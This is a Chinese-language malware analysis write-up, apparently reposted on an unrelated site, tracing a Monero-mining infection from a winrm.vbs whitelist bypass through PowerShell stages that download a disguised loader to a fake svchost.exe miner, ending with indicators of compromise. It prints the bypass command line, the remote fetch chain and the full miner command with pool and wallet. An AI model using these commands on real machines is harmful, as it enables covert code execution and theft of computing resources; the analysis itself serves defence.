一个简单的挖矿病毒分析 |
您所在的位置:网站首页 › 最简单挖矿 › 一个简单的挖矿病毒分析 |
本文作者:信安之路病毒分析小组全体成员 样本概述樣本信息: CMD 命令行.txt,start.ps1,1.ps1,knbhm.jpg,svchost.exe VirusTotal: 以下僅是 knbhm.jpg 的查詢結果 ![]() ![]() 攻击者先通过调用 CMD 命令利用 winrm.vbs 来绕过白名单限制执行任意 XSL 代码,执行的命令行如下: "C:\Users\Public\cscript.exe" //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty 详情请参考: https://www.freebuf.com/articles/system/178035.html XSL 代码会执行一段 Powershell 命令,我们将其命名爲 start.ps1, ![]() Base64 解密后 ![]() start.ps1 会向 http:##ps.nameapp.website 发起请求,并下载 1.ps1 ![]() 1.ps1 會从 http:##ss.pumkkbx.website/knbhm.jpg 下載 knbhm.jpg,落到本地磁盘,并执行, knbhm.exe 作爲一个 Loader 会在临时目录下释放假的 svchost.exe,实际上是一个挖矿程序,并以特定的参数啓动,釋放完 svchost 后調用 CMD 進行自刪除,火绒剑监控行爲如下 ![]() knbhm.exe 只做了简单且并没有什麼技术含量的混淆 ![]() 釋放的 svchost.exe 是经过 Zlib 压缩后存放在 knbhm.exe 的数据段中,在 knbhm.exe 运行过程中会进行對其解压缩: ![]() 地址偏移+0xC 處存放着右移一位后的文件大小,接着分配相应大小的空间进行解压缩,Zlib 版本號 1.1.3 ![]() 之后调用 CreateProcess,啓动挖矿进程。 ![]() c:\Windows\temp\svchost.exe -a cryptonight -o stratum+tcp://pool.minexmr.com:80 -u 47461u5xNSR9A727pZGhFZKpstAU35mfiZWvm6hzfKcEWDgJAc9sn3tDSJGPpA1MaqbgQ4wfv1PyuPAw7KVbHhF837QHdT9 -p x 挖门罗币,矿池地址: pool.minexmr.com:80 钱包地址: 47461u5xNSR9A727pZGhFZKpstAU35mfiZWvm6hzfKcEWDgJAc9sn3tDSJGPpA1MaqbgQ4wfv1PyuPAw7KVbHhF837QHdT9 在门罗币官网上进行查询 ![]() 這老哥剛開始挖…… IOCURL: http://ss[.]pumkkbx[.]website/knbhm[.]jpg http://ps[.]nameapp[.]website SHA1: 3a50f2d49dc7261cafabda424273d7dd3d97703b 8647bf18b50098d8785214fcf557373407591ad9 559d409194d64a518c61e46a552011d42a075f5a |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |